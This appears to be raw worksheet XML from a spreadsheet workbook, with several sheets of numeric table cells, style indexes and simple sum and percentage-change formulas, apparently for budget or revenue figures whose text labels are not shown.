      <c r="D23" s="417"/>
      <c r="E23" s="417"/>
      <c r="F23" s="418"/>
    </row>
    <row r="24" ht="14.4" spans="1:6">
      <c r="A24" s="418"/>
      <c r="B24" s="417"/>
      <c r="C24" s="417"/>
      <c r="D24" s="417"/>
      <c r="E24" s="417"/>
      <c r="F24" s="418"/>
    </row>
    <row r="25" spans="2:5">
      <c r="B25" s="417"/>
      <c r="C25" s="417"/>
      <c r="D25" s="417"/>
      <c r="E25" s="417"/>
    </row>
    <row r="26" ht="14.4" spans="1:6">
      <c r="A26" s="418"/>
      <c r="B26" s="417"/>
      <c r="C26" s="417"/>
      <c r="D26" s="417"/>
      <c r="E26" s="417"/>
      <c r="F26" s="418"/>
    </row>
    <row r="27" ht="14.4" spans="1:6">
      <c r="A27" s="418"/>
      <c r="B27" s="417"/>
      <c r="C27" s="417"/>
      <c r="D27" s="417"/>
      <c r="E27" s="417"/>
      <c r="F27" s="418"/>
    </row>
    <row r="28" ht="14.4" spans="1:6">
      <c r="A28" s="418"/>
      <c r="B28" s="417"/>
      <c r="C28" s="417"/>
      <c r="D28" s="417"/>
      <c r="E28" s="417"/>
      <c r="F28" s="418"/>
    </row>
    <row r="29" ht="14.4" spans="1:6">
      <c r="A29" s="418"/>
      <c r="B29" s="417"/>
      <c r="C29" s="417"/>
      <c r="D29" s="417"/>
      <c r="E29" s="417"/>
      <c r="F29" s="418"/>
    </row>
    <row r="30" ht="14.4" spans="1:6">
      <c r="A30" s="418"/>
      <c r="B30" s="417"/>
      <c r="C30" s="417"/>
      <c r="D30" s="417"/>
      <c r="E30" s="417"/>
      <c r="F30" s="418"/>
    </row>
    <row r="31" ht="14.4" spans="1:6">
      <c r="A31" s="418"/>
      <c r="B31" s="417"/>
      <c r="C31" s="417"/>
      <c r="D31" s="417"/>
      <c r="E31" s="417"/>
      <c r="F31" s="418"/>
    </row>
    <row r="32" ht="14.4" spans="1:6">
      <c r="A32" s="418"/>
      <c r="B32" s="417"/>
      <c r="C32" s="417"/>
      <c r="D32" s="417"/>
      <c r="E32" s="417"/>
      <c r="F32" s="418"/>
    </row>
    <row r="33" ht="14.4" spans="1:6">
      <c r="A33" s="418"/>
      <c r="B33" s="417"/>
      <c r="C33" s="417"/>
      <c r="D33" s="417"/>
      <c r="E33" s="417"/>
      <c r="F33" s="418"/>
    </row>
    <row r="34" spans="2:5">
      <c r="B34" s="417"/>
      <c r="C34" s="417"/>
      <c r="D34" s="417"/>
      <c r="E34" s="417"/>
    </row>
    <row r="35" spans="2:5">
      <c r="B35" s="417"/>
      <c r="C35" s="417"/>
      <c r="D35" s="417"/>
      <c r="E35" s="417"/>
    </row>
    <row r="36" spans="2:5">
      <c r="B36" s="417"/>
      <c r="C36" s="417"/>
      <c r="D36" s="417"/>
      <c r="E36" s="417"/>
    </row>
    <row r="37" spans="2:5">
      <c r="B37" s="417"/>
      <c r="C37" s="417"/>
      <c r="D37" s="417"/>
      <c r="E37" s="417"/>
    </row>
    <row r="38" spans="2:5">
      <c r="B38" s="417"/>
      <c r="C38" s="417"/>
      <c r="D38" s="417"/>
      <c r="E38" s="417"/>
    </row>
    <row r="39" spans="2:5">
      <c r="B39" s="417"/>
      <c r="C39" s="417"/>
      <c r="D39" s="417"/>
      <c r="E39" s="417"/>
    </row>
    <row r="40" spans="2:5">
      <c r="B40" s="417"/>
      <c r="C40" s="417"/>
      <c r="D40" s="417"/>
      <c r="E40" s="417"/>
    </row>
    <row r="41" spans="2:5">
      <c r="B41" s="417"/>
      <c r="C41" s="417"/>
      <c r="D41" s="417"/>
      <c r="E41" s="417"/>
    </row>
    <row r="42" spans="2:5">
      <c r="B42" s="417"/>
      <c r="C42" s="417"/>
      <c r="D42" s="417"/>
      <c r="E42" s="417"/>
    </row>
    <row r="43" spans="2:5">
      <c r="B43" s="417"/>
      <c r="C43" s="417"/>
      <c r="D43" s="417"/>
      <c r="E43" s="417"/>
    </row>
    <row r="44" spans="2:5">
      <c r="B44" s="417"/>
      <c r="C44" s="417"/>
      <c r="D44" s="417"/>
      <c r="E44" s="417"/>
    </row>
    <row r="45" spans="2:5">
      <c r="B45" s="417"/>
      <c r="C45" s="417"/>
      <c r="D45" s="417"/>
      <c r="E45" s="417"/>
    </row>
    <row r="46" spans="2:5">
      <c r="B46" s="417"/>
      <c r="C46" s="417"/>
      <c r="D46" s="417"/>
      <c r="E46" s="417"/>
    </row>
    <row r="47" spans="2:5">
      <c r="B47" s="417"/>
      <c r="C47" s="417"/>
      <c r="D47" s="417"/>
      <c r="E47" s="417"/>
    </row>
    <row r="48" spans="2:5">
      <c r="B48" s="417"/>
      <c r="C48" s="417"/>
      <c r="D48" s="417"/>
      <c r="E48" s="417"/>
    </row>
    <row r="49" spans="2:5">
      <c r="B49" s="417"/>
      <c r="C49" s="417"/>
      <c r="D49" s="417"/>
      <c r="E49" s="417"/>
    </row>
    <row r="50" spans="2:5">
      <c r="B50" s="417"/>
      <c r="C50" s="417"/>
      <c r="D50" s="417"/>
      <c r="E50" s="417"/>
    </row>
    <row r="51" spans="2:5">
      <c r="B51" s="417"/>
      <c r="C51" s="417"/>
      <c r="D51" s="417"/>
      <c r="E51" s="417"/>
    </row>
    <row r="52" spans="2:5">
      <c r="B52" s="417"/>
      <c r="C52" s="417"/>
      <c r="D52" s="417"/>
      <c r="E52" s="417"/>
    </row>
    <row r="53" spans="2:5">
      <c r="B53" s="417"/>
      <c r="C53" s="417"/>
      <c r="D53" s="417"/>
      <c r="E53" s="417"/>
    </row>
    <row r="54" spans="2:5">
      <c r="B54" s="417"/>
      <c r="C54" s="417"/>
      <c r="D54" s="417"/>
      <c r="E54" s="417"/>
    </row>
    <row r="55" spans="2:5">
      <c r="B55" s="417"/>
      <c r="C55" s="417"/>
      <c r="D55" s="417"/>
      <c r="E55" s="417"/>
    </row>
    <row r="56" spans="2:5">
      <c r="B56" s="417"/>
      <c r="C56" s="417"/>
      <c r="D56" s="417"/>
      <c r="E56" s="417"/>
    </row>
    <row r="57" spans="2:5">
      <c r="B57" s="417"/>
      <c r="C57" s="417"/>
      <c r="D57" s="417"/>
      <c r="E57" s="417"/>
    </row>
    <row r="58" spans="2:5">
      <c r="B58" s="417"/>
      <c r="C58" s="417"/>
      <c r="D58" s="417"/>
      <c r="E58" s="417"/>
    </row>
    <row r="59" spans="2:5">
      <c r="B59" s="417"/>
      <c r="C59" s="417"/>
      <c r="D59" s="417"/>
      <c r="E59" s="417"/>
    </row>
    <row r="60" spans="2:5">
      <c r="B60" s="417"/>
      <c r="C60" s="417"/>
      <c r="D60" s="417"/>
      <c r="E60" s="417"/>
    </row>
    <row r="61" spans="2:5">
      <c r="B61" s="417"/>
      <c r="C61" s="417"/>
      <c r="D61" s="417"/>
      <c r="E61" s="417"/>
    </row>
    <row r="62" spans="2:5">
      <c r="B62" s="417"/>
      <c r="C62" s="417"/>
      <c r="D62" s="417"/>
      <c r="E62" s="417"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A2:E2"/>
    <mergeCell ref="C4:E4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>
  <pageSetup paperSize="9" orientation="portrait"/>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6"/>
  </sheetPr>
  <dimension ref="A1:I14"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="E11" sqref="E11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="27.1851851851852" style="899" customWidth="1"/>
    <col min="2" max="2" width="12.0925925925926" style="899" customWidth="1"/>
    <col min="3" max="3" width="12.2777777777778" style="940" customWidth="1"/>
    <col min="4" max="4" width="12.2777777777778" style="899" customWidth="1"/>
    <col min="5" max="6" width="12.2777777777778" style="941" customWidth="1"/>
    <col min="7" max="16384" width="10.2777777777778" style="899"/>
  </cols>
  <sheetData>
    <row r="1" ht="23.25" customHeight="1" spans="1:1">
      <c r="A1" s="864" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="2" ht="26.4" spans="1:6">
      <c r="A2" s="901" t="s">
        <v>820</v>
      </c>
      <c r="B2" s="901"/>
      <c r="C2" s="942"/>
      <c r="D2" s="901"/>
      <c r="E2" s="901"/>
      <c r="F2" s="901"/>
    </row>
    <row r="3" ht="23" customHeight="1" spans="1:6">
      <c r="A3" s="943"/>
      <c r="B3" s="943"/>
      <c r="C3" s="943"/>
      <c r="D3" s="944"/>
      <c r="E3" s="945"/>
      <c r="F3" s="946" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="22.5" customHeight="1" spans="1:6">
      <c r="A4" s="919" t="s">
        <v>753</v>
      </c>
      <c r="B4" s="920" t="s">
        <v>615</v>
      </c>
      <c r="C4" s="920" t="s">
        <v>616</v>
      </c>
      <c r="D4" s="921" t="s">
        <v>617</v>
      </c>
      <c r="E4" s="921"/>
      <c r="F4" s="921"/>
    </row>
    <row r="5" ht="23.25" customHeight="1" spans="1:6">
      <c r="A5" s="922"/>
      <c r="B5" s="920"/>
      <c r="C5" s="920"/>
      <c r="D5" s="921" t="s">
        <v>378</v>
      </c>
      <c r="E5" s="947" t="s">
        <v>618</v>
      </c>
      <c r="F5" s="923" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="6" ht="30.95" customHeight="1" spans="1:6">
      <c r="A6" s="390" t="s">
        <v>620</v>
      </c>
      <c r="B6" s="948">
        <f>B9+B12</f>
        <v>87700</v>
      </c>
      <c r="C6" s="935">
        <f>C9+C12</f>
        <v>108602</v>
      </c>
      <c r="D6" s="935">
        <f>D9+D12</f>
        <v>92712</v>
      </c>
      <c r="E6" s="949">
        <f t="shared" ref="E6:E14" si="0">D6/C6*100</f>
        <v>85.3685935802287</v>
      </c>
      <c r="F6" s="949">
        <f t="shared" ref="F6:F14" si="1">(D6-B6)/B6*100</f>
        <v>5.71493728620296</v>
      </c>
    </row>
    <row r="7" ht="30.95" customHeight="1" spans="1:6">
      <c r="A7" s="388" t="s">
        <v>621</v>
      </c>
      <c r="B7" s="929">
        <v>35718</v>
      </c>
      <c r="C7" s="913">
        <v>31734</v>
      </c>
      <c r="D7" s="913">
        <v>32790</v>
      </c>
      <c r="E7" s="950">
        <f t="shared" si="0"/>
        <v>103.327661183589</v>
      </c>
      <c r="F7" s="950">
        <f t="shared" si="1"/>
        <v>-8.19754745506467</v>
      </c>
    </row>
    <row r="8" ht="30.95" customHeight="1" spans="1:6">
      <c r="A8" s="388" t="s">
        <v>622</v>
      </c>
      <c r="B8" s="929">
        <v>49140</v>
      </c>
      <c r="C8" s="913">
        <v>72688</v>
      </c>
      <c r="D8" s="913">
        <v>56711</v>
      </c>
      <c r="E8" s="950">
        <f t="shared" si="0"/>
        <v>78.0197556680608</v>
      </c>
      <c r="F8" s="950">
        <f t="shared" si="1"/>
        <v>15.4070004070004</v>
      </c>
    </row>
    <row r="9" ht="30.95" customHeight="1" spans="1:6">
      <c r="A9" s="388" t="s">
        <v>623</v>
      </c>
      <c r="B9" s="929">
        <v>53959</v>
      </c>
      <c r="C9" s="913">
        <v>59372</v>
      </c>
      <c r="D9" s="913">
        <v>59631</v>
      </c>
      <c r="E9" s="950">
        <f t="shared" si="0"/>
        <v>100.43623256754</v>
      </c>
      <c r="F9" s="950">
        <f t="shared" si="1"/>
        <v>10.5116847977168</v>
      </c>
    </row>
    <row r="10" ht="30.95" customHeight="1" spans="1:6">
      <c r="A10" s="388" t="s">
        <v>621</v>
      </c>
      <c r="B10" s="929">
        <v>28852</v>
      </c>
      <c r="C10" s="913">
        <v>30234</v>
      </c>
      <c r="D10" s="913">
        <v>30220</v>
      </c>
      <c r="E10" s="950">
        <f t="shared" si="0"/>
        <v>99.9536945161077</v>
      </c>
      <c r="F10" s="950">
        <f t="shared" si="1"/>
        <v>4.74143906834882</v>
      </c>
    </row>
    <row r="11" ht="30.95" customHeight="1" spans="1:9">
      <c r="A11" s="388" t="s">
        <v>622</v>
      </c>
      <c r="B11" s="929">
        <v>24559</v>
      </c>
      <c r="C11" s="913">
        <v>28500</v>
      </c>
      <c r="D11" s="913">
        <v>28500</v>
      </c>
      <c r="E11" s="950">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="F11" s="950">
        <f t="shared" si="1"/>
        <v>16.0470703204528</v>
      </c>
      <c r="I11" s="952"/>
    </row>
    <row r="12" ht="30.95" customHeight="1" spans="1:6">
      <c r="A12" s="388" t="s">
        <v>624</v>
      </c>
      <c r="B12" s="929">
        <v>33741</v>
      </c>
      <c r="C12" s="913">
        <v>49230</v>
      </c>
      <c r="D12" s="913">
        <v>33081</v>
      </c>
      <c r="E12" s="950">
        <f t="shared" si="0"/>
        <v>67.1968312004875</v>
      </c>
      <c r="F12" s="950">
        <f t="shared" si="1"/>
        <v>-1.95607717613586</v>
      </c>
    </row>
    <row r="13" ht="30.95" customHeight="1" spans="1:6">
      <c r="A13" s="388" t="s">
        <v>621</v>
      </c>
      <c r="B13" s="929">
        <v>6866</v>
      </c>
      <c r="C13" s="913">
        <v>1500</v>
      </c>
      <c r="D13" s="913">
        <v>2571</v>
      </c>
      <c r="E13" s="950">
        <f t="shared" si="0"/>
        <v>171.4</v>
      </c>
      <c r="F13" s="950">
        <f t="shared" si="1"/>
        <v>-62.5546169531022</v>
      </c>
    </row>
    <row r="14" ht="30.95" customHeight="1" spans="1:6">
      <c r="A14" s="392" t="s">
        <v>622</v>
      </c>
      <c r="B14" s="938">
        <v>24581</v>
      </c>
      <c r="C14" s="916">
        <v>44188</v>
      </c>
      <c r="D14" s="916">
        <v>28211</v>
      </c>
      <c r="E14" s="951">
        <f t="shared" si="0"/>
        <v>63.8431248302707</v>
      </c>
      <c r="F14" s="951">
        <f t="shared" si="1"/>
        <v>14.7675033562508</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="D4:F4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>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5:M24"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="G27" sqref="G27"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.84259259259259" defaultRowHeight="13.2"/>
  <cols>
    <col min="2" max="2" width="10.1481481481481" customWidth="1"/>
    <col min="4" max="4" width="14.7222222222222" customWidth="1"/>
    <col min="6" max="6" width="9.72222222222222" customWidth="1"/>
    <col min="7" max="7" width="21.4259259259259" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="15" ht="71.1" customHeight="1" spans="1:7">
      <c r="A15" s="1185" t="s">
        <v>206</v>
      </c>
      <c r="B15" s="1185"/>
      <c r="C15" s="1185"/>
      <c r="D15" s="1185"/>
      <c r="E15" s="1185"/>
      <c r="F15" s="1185"/>
      <c r="G15" s="1185"/>
    </row>
    <row r="19" ht="51" customHeight="1"/>
    <row r="24" ht="28.2" spans="1:13">
      <c r="A24" s="1186"/>
      <c r="B24" s="1187"/>
      <c r="C24" s="1187"/>
      <c r="D24" s="1187"/>
      <c r="E24" s="1187"/>
      <c r="F24" s="1187"/>
      <c r="G24" s="1187"/>
      <c r="M24" s="1188"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A15:G15"/>
    <mergeCell ref="A24:G24"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>
  <pageSetup paperSize="9" orientation="portrait"/>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6"/>
  </sheetPr>
  <dimension ref="A1:F11"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="G15" sqref="G15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="5"/>
  <cols>
    <col min="1" max="1" width="30" style="917" customWidth="1"/>
    <col min="2" max="6" width="11.4259259259259" style="899" customWidth="1"/>
    <col min="7" max="16384" width="10.2777777777778" style="899"/>
  </cols>
  <sheetData>
    <row r="1" ht="30" customHeight="1" spans="1:1">
      <c r="A1" s="918" t="s">
        <v>821</v>
      </c>
    </row>
    <row r="2" ht="26.4" spans="1:6">
      <c r="A2" s="901" t="s">
        <v>822</v>
      </c>
      <c r="B2" s="901"/>
      <c r="C2" s="901"/>
      <c r="D2" s="901"/>
      <c r="E2" s="901"/>
      <c r="F2" s="901"/>
    </row>
    <row r="3" ht="13.2" spans="1:6">
      <c r="A3" s="903" t="s">
        <v>373</v>
      </c>
      <c r="B3" s="903"/>
      <c r="C3" s="903"/>
      <c r="D3" s="903"/>
      <c r="E3" s="903"/>
      <c r="F3" s="903"/>
    </row>
    <row r="4" ht="29.1" customHeight="1" spans="1:6">
      <c r="A4" s="919" t="s">
        <v>753</v>
      </c>
      <c r="B4" s="920" t="s">
        <v>615</v>
      </c>
      <c r="C4" s="920" t="s">
        <v>616</v>
      </c>
      <c r="D4" s="921" t="s">
        <v>617</v>
      </c>
      <c r="E4" s="921"/>
      <c r="F4" s="921"/>
    </row>
    <row r="5" ht="29.1" customHeight="1" spans="1:6">
      <c r="A5" s="922"/>
      <c r="B5" s="920"/>
      <c r="C5" s="920"/>
      <c r="D5" s="921" t="s">
        <v>378</v>
      </c>
      <c r="E5" s="923" t="s">
        <v>618</v>
      </c>
      <c r="F5" s="923" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="6" ht="35.1" customHeight="1" spans="1:6">
      <c r="A6" s="362" t="s">
        <v>627</v>
      </c>
      <c r="B6" s="924">
        <v>54382</v>
      </c>
      <c r="C6" s="925">
        <v>58887</v>
      </c>
      <c r="D6" s="926">
        <v>59396</v>
      </c>
      <c r="E6" s="927">
        <f t="shared" ref="E6:E11" si="0">D6/C6*100</f>
        <v>100.864367347632</v>
      </c>
      <c r="F6" s="927">
        <f t="shared" ref="F6:F11" si="1">(D6-B6)/B6*100</f>
        <v>9.2199624875878</v>
      </c>
    </row>
    <row r="7" ht="35.1" customHeight="1" spans="1:6">
      <c r="A7" s="928" t="s">
        <v>628</v>
      </c>
      <c r="B7" s="929">
        <v>54274</v>
      </c>
      <c r="C7" s="913">
        <v>57512</v>
      </c>
      <c r="D7" s="930">
        <v>57493</v>
      </c>
      <c r="E7" s="931">
        <f t="shared" si="0"/>
        <v>99.9669634163305</v>
      </c>
      <c r="F7" s="931">
        <f t="shared" si="1"/>
        <v>5.93101669307587</v>
      </c>
    </row>
    <row r="8" ht="35.1" customHeight="1" spans="1:6">
      <c r="A8" s="365" t="s">
        <v>629</v>
      </c>
      <c r="B8" s="929">
        <v>35685</v>
      </c>
      <c r="C8" s="913">
        <v>40936</v>
      </c>
      <c r="D8" s="930">
        <v>40897</v>
      </c>
      <c r="E8" s="931">
        <f t="shared" si="0"/>
        <v>99.9047293335939</v>
      </c>
      <c r="F8" s="931">
        <f t="shared" si="1"/>
        <v>14.6055765727897</v>
      </c>
    </row>
    <row r="9" ht="35.1" customHeight="1" spans="1:6">
      <c r="A9" s="932" t="s">
        <v>630</v>
      </c>
      <c r="B9" s="929">
        <v>35594</v>
      </c>
      <c r="C9" s="913">
        <v>40896</v>
      </c>
      <c r="D9" s="930">
        <v>40857</v>
      </c>
      <c r="E9" s="931">
        <f t="shared" si="0"/>
        <v>99.9046361502347</v>
      </c>
      <c r="F9" s="931">
        <f t="shared" si="1"/>
        <v>14.7861999213351</v>
      </c>
    </row>
    <row r="10" ht="35.1" customHeight="1" spans="1:6">
      <c r="A10" s="933" t="s">
        <v>631</v>
      </c>
      <c r="B10" s="934">
        <v>90067</v>
      </c>
      <c r="C10" s="935">
        <v>99823</v>
      </c>
      <c r="D10" s="935">
        <v>100293</v>
      </c>
      <c r="E10" s="936">
        <f t="shared" si="0"/>
        <v>100.470833375074</v>
      </c>
      <c r="F10" s="936">
        <f t="shared" si="1"/>
        <v>11.3537699712436</v>
      </c>
    </row>
    <row r="11" ht="35.1" customHeight="1" spans="1:6">
      <c r="A11" s="937" t="s">
        <v>632</v>
      </c>
      <c r="B11" s="938">
        <v>89869</v>
      </c>
      <c r="C11" s="916">
        <v>98408</v>
      </c>
      <c r="D11" s="916">
        <v>98350</v>
      </c>
      <c r="E11" s="939">
        <f t="shared" si="0"/>
        <v>99.9410617023006</v>
      </c>
      <c r="F11" s="939">
        <f t="shared" si="1"/>
        <v>9.43706951229011</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="6">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="A3:F3"/>
    <mergeCell ref="D4:F4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>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6"/>
  </sheetPr>
  <dimension ref="A1:D8"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="E8" sqref="E8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelRow="7" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="39.5740740740741" style="899" customWidth="1"/>
    <col min="2" max="3" width="22.1481481481481" style="899" customWidth="1"/>
    <col min="4" max="16384" width="10.2777777777778" style="899"/>
  </cols>
  <sheetData>
    <row r="1" ht="20.25" customHeight="1" spans="1:1">
      <c r="A1" s="900" t="s">
        <v>823</v>
      </c>
    </row>
    <row r="2" ht="26.4" spans="1:3">
      <c r="A2" s="901" t="s">
        <v>824</v>
      </c>
      <c r="B2" s="901"/>
      <c r="C2" s="901"/>
    </row>
    <row r="3" ht="18" customHeight="1" spans="1:3">
      <c r="A3" s="902"/>
      <c r="B3" s="902"/>
      <c r="C3" s="903" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="13.2" spans="1:4">
      <c r="A4" s="904" t="s">
        <v>724</v>
      </c>
      <c r="B4" s="904" t="s">
        <v>615</v>
      </c>
      <c r="C4" s="905" t="s">
        <v>519</v>
      </c>
      <c r="D4" s="906"/>
    </row>
    <row r="5" ht="13.2" spans="1:3">
      <c r="A5" s="907"/>
      <c r="B5" s="907"/>
      <c r="C5" s="908"/>
    </row>
    <row r="6" ht="44.25" customHeight="1" spans="1:3">
      <c r="A6" s="909" t="s">
        <v>635</v>
      </c>
      <c r="B6" s="910">
        <f>SUM(B7:B8)</f>
        <v>84103</v>
      </c>
      <c r="C6" s="910">
        <f>SUM(C7:C8)</f>
        <v>76524</v>
      </c>
    </row>
    <row r="7" ht="44.25" customHeight="1" spans="1:3">
      <c r="A7" s="911" t="s">
        <v>636</v>
      </c>
      <c r="B7" s="912">
        <v>228</v>
      </c>
      <c r="C7" s="913">
        <v>465</v>
      </c>
    </row>
    <row r="8" ht="44.25" customHeight="1" spans="1:3">
      <c r="A8" s="914" t="s">
        <v>637</v>
      </c>
      <c r="B8" s="915">
        <v>83875</v>
      </c>
      <c r="C8" s="916">
        <v>76059</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A2:C2"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.314583333333333" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>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7"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A3" sqref="A3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.14814814814815" defaultRowHeight="13.2" outlineLevelRow="6"/>
  <cols>
    <col min="1" max="1" width="89.7222222222222" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="57" customHeight="1"/>
    <row r="2" ht="57" customHeight="1"/>
    <row r="3" ht="148.8" spans="1:1">
      <c r="A3" s="78" t="s">
        <v>825</v>
      </c>
    </row>
    <row r="4" ht="57" customHeight="1"/>
    <row r="5" ht="57" customHeight="1"/>
    <row r="6" ht="57" customHeight="1"/>
    <row r="7" ht="57" customHeight="1"/>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:D44"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection/>
      <selection pane="bottomLeft" activeCell="C6" sqref="C6:C19"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="21" customHeight="1" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="39.5740740740741" style="887" customWidth="1"/>
    <col min="2" max="2" width="17.1481481481481" style="888" customWidth="1"/>
    <col min="3" max="3" width="15.7222222222222" style="888" customWidth="1"/>
    <col min="4" max="4" width="18.1481481481481" style="888" customWidth="1"/>
    <col min="5" max="16384" width="10.2777777777778" style="887"/>
  </cols>
  <sheetData>
    <row r="1" ht="21.95" customHeight="1" spans="1:1">
      <c r="A1" s="864" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="2" ht="30.95" customHeight="1" spans="1:4">
      <c r="A2" s="722" t="s">
        <v>827</v>
      </c>
      <c r="B2" s="722"/>
      <c r="C2" s="722"/>
      <c r="D2" s="722"/>
    </row>
    <row r="3" s="883" customFormat="1" customHeight="1" spans="1:4">
      <c r="A3" s="865" t="s">
        <v>373</v>
      </c>
      <c r="B3" s="725"/>
      <c r="C3" s="725"/>
      <c r="D3" s="725"/>
    </row>
    <row r="4" s="872" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A4" s="889" t="s">
        <v>828</v>
      </c>
      <c r="B4" s="727" t="s">
        <v>519</v>
      </c>
      <c r="C4" s="728" t="s">
        <v>829</v>
      </c>
      <c r="D4" s="890" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="5" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A5" s="766" t="s">
        <v>830</v>
      </c>
      <c r="B5" s="869">
        <f>SUM(B6:B20)</f>
        <v>131310</v>
      </c>
      <c r="C5" s="869">
        <f>SUM(C6:C20)</f>
        <v>140502</v>
      </c>
      <c r="D5" s="733">
        <f>IFERROR((C5-B5)/B5*100,"-")</f>
        <v>7.00022846698652</v>
      </c>
    </row>
    <row r="6" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A6" s="769" t="s">
        <v>831</v>
      </c>
      <c r="B6" s="775">
        <v>59008</v>
      </c>
      <c r="C6" s="891">
        <v>61850</v>
      </c>
      <c r="D6" s="733">
        <f t="shared" ref="D6:D41" si="0">IFERROR((C6-B6)/B6*100,"-")</f>
        <v>4.81629609544469</v>
      </c>
    </row>
    <row r="7" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A7" s="769" t="s">
        <v>832</v>
      </c>
      <c r="B7" s="775">
        <v>23727</v>
      </c>
      <c r="C7" s="891">
        <v>24639</v>
      </c>
      <c r="D7" s="733">
        <f t="shared" si="0"/>
        <v>3.84372234163611</v>
      </c>
    </row>
    <row r="8" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A8" s="769" t="s">
        <v>833</v>
      </c>
      <c r="B8" s="775">
        <v>6694</v>
      </c>
      <c r="C8" s="732">
        <v>6997</v>
      </c>
      <c r="D8" s="733">
        <f t="shared" si="0"/>
        <v>4.52644158948312</v>
      </c>
    </row>
    <row r="9" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A9" s="769" t="s">
        <v>834</v>
      </c>
      <c r="B9" s="775">
        <v>4371</v>
      </c>
      <c r="C9" s="732">
        <v>4654</v>
      </c>
      <c r="D9" s="733">
        <f t="shared" si="0"/>
        <v>6.47449096316632</v>
      </c>
    </row>
    <row r="10" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A10" s="769" t="s">
        <v>835</v>
      </c>
      <c r="B10" s="775">
        <v>5595</v>
      </c>
      <c r="C10" s="732">
        <v>5890</v>
      </c>
      <c r="D10" s="733">
        <f t="shared" si="0"/>
        <v>5.27256478999106</v>
      </c>
    </row>
    <row r="11" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A11" s="769" t="s">
        <v>836</v>
      </c>
      <c r="B11" s="775">
        <v>12178</v>
      </c>
      <c r="C11" s="732">
        <v>13012</v>
      </c>
      <c r="D11" s="733">
        <f t="shared" si="0"/>
        <v>6.84841517490557</v>
      </c>
    </row>
    <row r="12" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A12" s="769" t="s">
        <v>837</v>
      </c>
      <c r="B12" s="775">
        <v>2095</v>
      </c>
      <c r="C12" s="732">
        <v>2015</v>
      </c>
      <c r="D12" s="733">
        <f t="shared" si="0"/>
        <v>-3.81861575178998</v>
      </c>
    </row>
    <row r="13" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A13" s="769" t="s">
        <v>838</v>
      </c>
      <c r="B13" s="775">
        <v>5414</v>
      </c>
      <c r="C13" s="732">
        <v>5912</v>
      </c>
      <c r="D13" s="733">
        <f t="shared" si="0"/>
        <v>9.19837458441079</v>
      </c>
    </row>
